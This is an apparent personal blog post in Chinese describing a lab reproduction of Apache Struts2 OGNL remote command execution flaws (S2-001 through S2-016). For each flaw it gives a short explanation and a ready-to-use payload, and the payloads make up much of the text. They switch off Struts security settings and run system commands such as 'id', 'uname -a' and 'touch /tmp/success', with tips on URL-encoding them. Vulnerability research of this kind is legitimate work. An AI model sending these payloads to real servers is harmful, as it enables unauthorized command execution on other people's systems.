---
title: Struts2命令执行
date: 2018-12-27
tags:
  - Web
  - JavaWeb
categories: 渗透测试



---

最近一直在搞渗透，好久没写博客了的样子,一直对Struts2命令执行不太了解，这次趁着有空，搭建了环境，大部分漏洞都利用了下

<!--more-->

## S2-001

### <font color=green>原理</font>

<font face="微软雅黑">该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行</font>

### <font color=green>POC</font>

获取tomcat执行路径：

```
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
```

### <font color=green>利用</font>



直接在页面输入的时候可以用以上POC，但是在burp里面需要进行编码

![](Struts2命令执行小计/1.jpeg)



## S2-003/S2-005

### <font color=green>原理</font>

<font face="微软雅黑">S2-003漏洞发生在请求参数名，Struts2框架会对每个请求参数名解析为OGNL语句执行，因此，恶意用户可通过在参数名处注入预先设定好的OGNL语句来达到远程代码执行的攻击效果;struts框架通过过滤#字符防止安全问题，然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制，对于S2-003漏洞，官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补，但是安全配置被绕过再次导致了漏洞，攻击者可以利用OGNL表达式将这2个选项打开</font>

### <font color=green>POC</font>

S2-005(也可以用在S2-003中),直接在.action?加上去就可以了

```
(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1
```

没有回显

## S2-007

### <font color=green>原理</font>

<font face="微软雅黑">用户输入将被当作OGNL表达式解析，当对用户输入进行验证出现类型转换错误时。如配置了验证规则`<ActionName>`-validation.xml时，若类型验证转换出错，后端默认会将用户提交的表单值通过字符串拼接，然后执行一次OGNL表达式解析并返回。例如：当用户提交 age 为字符串而非整形数值时，后端用代码拼接 `"'" + value + "'"` 然后对其进行 OGNL 表达式解析。要成功利用，只需要找到一个配置了类似验证规则的表单字段使之转换出错，借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。</font>

### <font color=green>POC</font>

```
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '
```

### <font color=green>利用</font>

在输入框输入POC,提交即可

![](Struts2命令执行小计/7.png)

## S2-009

### <font color=green>原理</font>

<font face="微软雅黑">这个漏洞再次来源于s2-003、s2-005。两者的共同点是同样是发生在ParametersInterceptor拦截器中的漏洞。只不过在S2-005漏洞中，OGNL表达式通过参数名处注入，造成远程命令执行，而S2-009漏洞的OGNL表达式通过参数值注入。</font>

### <font color=green>POC</font>

假设参数为name

```
name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true
```

在/tmp/目录下创建success文件，无回显

## S2-015

### <font color=green>原理</font>

<font face="微软雅黑">漏洞产生于配置了 Action 通配符 *，并将其作为动态值时，解析时会将其内容执行 OGNL 表达式例如：</font>

```xml
<package name="S2-015" extends="struts-default">
    <action name="*" class="com.demo.action.PageAction">
        <result>/{1}.jsp</result>
    </action>
</package>
​```</font>
```

<font face="微软雅黑">上述配置能让我们访问 name.action 时使用 name.jsp 来渲染页面，但是在提取 name 并解析时，对其执行了 OGNL 表达式解析，所以导致命令执行。在实践复现的时候发现，由于 name 值的位置比较特殊，一些特殊的字符如 / " \ 都无法使用（转义也不行），所以在利用该点进行远程命令执行时一些带有路径的命令可能无法执行成功。</font>

### <font color=green>POC</font>

```
${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()),#q}
```

### <font color="Green">利用</font>

将POCURL编码后直接利用

![](Struts2命令执行小计/15.png)

## S2-016

### <font color=green>原理</font>

<font face="微软雅黑">在struts2中，DefaultActionMapper类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀，但是这些前缀后面同时可以跟OGNL表达式，由于struts2没有对这些前缀做过滤，导致利用OGNL表达式调用java静态方法执行任意系统命令</font>

### <font color=green>POC</font>

```
redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("uname -a").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}
```

### <font color="Green">利用</font>

同样需要把POC进行编码后利用

![](D:\hexo\source\_posts\Struts2命令执行小计\16.png)





## 暂告一段落

未完待续......